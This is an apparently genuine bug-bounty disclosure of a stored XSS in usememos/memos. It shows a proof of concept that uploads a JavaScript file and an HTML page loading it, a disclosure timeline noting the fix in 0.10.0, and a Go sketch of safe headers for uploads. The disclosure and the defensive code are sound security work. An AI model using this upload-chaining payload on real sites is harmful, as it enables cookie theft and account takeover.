Stored XSS using two files in usememos/memos

Valid

Reported on Jan 2nd 2023


Description

I uploaded two files (first => js, second => html). The first was a JS file with a malicious script; I got its URL and added it to the second one as the source for the script tag.

Proof of Concept

// test.js
alert("xss");

Assume its URL => https://demo.usememos.com/o/r/9/test.js

// test.html
<html>
<!-- src= "test.js path" -->
<script src="https://demo.usememos.com/o/r/9/test.js"></script>

<body>
hello world
</body>
</html>

There is a PoC video:

https://drive.google.com/file/d/1CEwSLczldBuKZBsVH-FtDKOBcZB4GysE/view?usp=share_link

Impact

If exploited, this vulnerability could allow an attacker to steal sensitive information, such as login credentials, from users visiting the affected website, leading to account takeover via stolen cookies.

Occurrences

We are processing your report and will contact the usememos/memos team within 24 hours. 7 days ago
Mahmoud Mosbah modified the report
7 days ago
Mahmoud Mosbah modified the report
7 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 6 days ago
STEVEN validated this vulnerability 5 days ago
Mahmoud Mosbah has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.10.0 with commit 46c13a 3 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 3 days ago
memo.go#L346 has been validated
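
The report turns on uploaded HTML and JavaScript being served back from the application's own origin in a form the browser will render and execute. The Go sketch below is an added example, not the memos fix from commit 46c13a and not code from the report; it shows one common way to choose response headers for user uploads. The helper name `uploadHeaders` and the allowlist are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
)

// Passive types that may render inline. Constructed allowlist for this
// example; image/svg+xml is deliberately absent because SVG can carry script.
var inlineSafe = map[string]bool{
	"image/png": true, "image/jpeg": true, "image/gif": true, "image/webp": true,
}

// uploadHeaders (hypothetical helper) builds the response headers for a
// user-uploaded file served from the application's own origin.
func uploadHeaders(filename, declaredType string) http.Header {
	mediaType, _, err := mime.ParseMediaType(declaredType) // lowercases the type
	disposition := "inline"
	if err != nil || !inlineSafe[mediaType] {
		// text/html, JavaScript, SVG, unknown or malformed types: force a
		// download as opaque bytes so the browser never renders or runs them.
		mediaType, disposition = "application/octet-stream", "attachment"
	}
	cd := mime.FormatMediaType(disposition, map[string]string{"filename": filename})
	if cd == "" {
		cd = disposition // unencodable filename: keep the disposition, drop the name
	}
	h := http.Header{}
	h.Set("Content-Type", mediaType)
	h.Set("Content-Disposition", cd)
	h.Set("X-Content-Type-Options", "nosniff")
	h.Set("Content-Security-Policy", "default-src 'none'; sandbox")
	return h
}

func main() {
	// Constructed inputs mirroring the two files in the report.
	for _, f := range [][2]string{
		{"test.js", "text/javascript"}, {"test.html", "text/html"}, {"logo.png", "image/png"},
	} {
		h := uploadHeaders(f[0], f[1])
		fmt.Printf("%-10s %-26s %s\n", f[0], h.Get("Content-Type"), h.Get("Content-Disposition"))
	}
}
```

With these headers the uploaded `test.html` is downloaded instead of rendered, and a `<script src>` pointing at the uploaded `test.js` is refused because `nosniff` rejects a script load whose type is `application/octet-stream`.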